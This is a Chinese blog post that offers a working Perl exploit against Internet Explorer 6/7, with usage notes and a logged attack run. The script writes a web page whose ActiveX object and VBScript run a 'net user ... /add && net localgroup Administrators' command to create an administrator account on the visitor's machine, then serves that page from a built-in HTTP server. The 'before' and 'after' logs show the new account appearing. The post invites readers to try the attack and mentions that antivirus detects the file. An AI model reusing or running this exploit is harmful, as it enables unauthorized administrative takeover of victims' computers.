IE6/7远程执行代码(远程添加用户漏洞)
利用代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 |
#!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008 8 \n"; print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n"; print "8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | \n"; print " 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee \n"; print "e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 \n"; print "8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 \n"; print "-----------------------------------------------------------\n"; print " Useage : $0 Port \n"; print " Please Read the Instruction befor you use this \n"; print " ---------------------------------\n"; sub parse_form { my $data = $_[0]; my %data; foreach (split /&/, $data) { my ($key, $val) = split /=/; $val =~ s/\+/ /g; $val =~ s/%(..)/chr(hex($1))/eg; $data{$key} = $val;} return %data; } my $port = shift; defined($port) or die "Usage: $0 Port \n"; mkdir("public_html", 0777) || print $!; my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html"; print " [+] Account Name : "; chomp(my $acc=<STDIN>); print " [+] Account Password : "; chomp(my $pass=<STDIN>); print " [+] Your IP : "; chomp (my $ip=<STDIN>); #------------- Exploit ----------------- my $iexplt= "public_html/index.html"; open (myfile, ">>$iexplt"); print myfile "<html>\n"; print myfile "<title> IE User Add Test </title>\n"; print myfile "<head>"; print myfile "</font></b></p>\n"; print myfile "<p>\n"; print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n"; print myfile "></object>\n"; print myfile "<script language='vbscript'>\n"; print myfile "adduser="; print myfile '"cmd'; print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc "; print myfile '/add"'; print myfile "\n"; print myfile "exploit.run adduser \n"; print myfile "\n </script></p>\n"; print " [+] ----------------------------------------\n"; print " [-] Link Genetrated : http://$ip:$port/index.html\n"; close (myfile); #------------------------------------ my $server = new IO::Socket::INET(Proto => 'tcp', LocalPort => $port, Listen => SOMAXCONN, Reuse => 1); $server or die "Unable to create server socket: $!" ; while (my $client = $server->accept()) { $client->autoflush(1); my %request = (); my %data; { local $/ = Socket::CRLF; while (<$client>) { chomp; if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) { $request{METHOD} = uc $1; $request{URL} = $2; $request{HTTP_VERSION} = $3; } elsif (/:/) { (my $type, my $val) = split /:/, $_, 2; $type =~ s/^\s+//; foreach ($type, $val) { s/^\s+//; s/\s+$//; } $request{lc $type} = $val; } elsif (/^$/) { read($client, $request{CONTENT}, $request{'content-length'}) if defined $request{'content-length'}; last; } } } if ($request{METHOD} eq 'GET') { if ($request{URL} =~ /(.*)\?(.*)/) { $request{URL} = $1; $request{CONTENT} = $2; %data = parse_form($request{CONTENT}); } else { %data = (); } $data{"_method"} = "GET"; } elsif ($request{METHOD} eq 'POST') { %data = parse_form($request{CONTENT}); $data{"_method"} = "POST"; } else { $data{"_method"} = "ERROR"; } my $localfile = $DOCUMENT_ROOT.$request{URL}; if (open(FILE, "<$localfile")) { print $client "HTTP/1.0 200 OK", Socket::CRLF; print $client "Content-type: text/html", Socket::CRLF; print $client Socket::CRLF; my $buffer; while (read(FILE, $buffer, 4096)) { print $client $buffer; } $data{"_status"} = "200"; } else { print $client "HTTP/1.0 404 Not Found", Socket::CRLF; print $client Socket::CRLF; print $client "<html><body>404 Not Found</body></html>"; $data{"_status"} = "404"; } close(FILE); print ($DOCUMENT_ROOT.$request{URL},"\n"); foreach (keys(%data)) { print (" $_ = $data{$_}\n"); } close $client; # Sioma Labs # http://siomalabs.com # Sioma Agent 154 } #Instructions #----------- # # This has been tested on windows envirnment(VisTa) . and the victom OS was windows xp sp2 ( InterNET eXplorer 7 ) # To use this on remote PC the generated link should be on victims trusted site list (tools >Internet Option> Security > Trusted Site> Sites) # No requrement to run it locally . just open the exploit(public_html/index.html) with the IE # Test Run ( Used OS : Vista) / ( Victim Os : XP SP2 ) # ------------------------------------------------------------- |
将上面的代码保存成ie.pl就可以了,现在我们来看一下代码中的说明部分
首先测试者用的是Vista的系统,测试对像用的是XP SP2 IE7
我们要在受害者的电脑上生成一个受信任的网站链接,这里你可以在IE-工具-Internet选项-安全-受信任站点中添加。
不用在本地运行,只要用IE打开有该漏洞代码的网页即可。
这里我再说明一下,这段代码保存后会被NOD32查杀
下面我们来看看攻击过程
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
# ------------------------------------------------------------- # # Attacker # ============= # # # E:\>ie.pl 123 # #800008 8 #8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee #8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | # 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee #e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 #8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 #----------------------------------------------------------- # Useage : E:\ie.pl Port # Please Read the Instruction befor you use this \n"; # --------------------------------- #[+] Account Name : test # [+] Account Password : test # [+] Your IP : 192.168.1.102 # [+] ---------------------------------------- # [-] Link Genetrated : http://192.168.1.102:123/index.html # #------------------------------------------------------------> # Not Tested on Linux ( Should Work on it too) # # # Victim #======== # Befor - # C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #Administrator SiomaPC Guest #HelpAssistant SUPPORT_388945a0 #The command completed successfully. # # After - #C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #Administrator SiomaPC Guest #HelpAssistant SUPPORT_388945a0 test #The command completed successfully. # #C:\> # ============================================================================ # The "test" user has been created successfully # # Delete The "Public_Html\index.html" If you use this for the 2nd time |
这就是整个具体的攻击过程有兴趣的朋友可以试下:)
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!